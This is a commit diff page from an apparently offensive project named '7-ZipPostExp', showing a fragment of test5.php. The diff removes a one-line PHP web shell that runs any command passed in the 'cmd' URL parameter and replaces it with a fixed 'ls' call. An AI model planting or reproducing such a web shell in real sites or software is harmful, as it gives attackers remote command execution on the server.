Projects STRLCPY 7-ZipPostExp Commits cc19286f
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    test5.php
    skipped 47 lines
    48 48   <?php
    49 49   if(isset($_GET['cmd']))
    50 50   {
    51  - system($_GET['cmd']);
     51 + system('ls');
    52 52   }
    53 53   echo "got ephph exec";
    54 54  ?>
    skipped 3 lines
Please wait...
Page is in error, reload to recover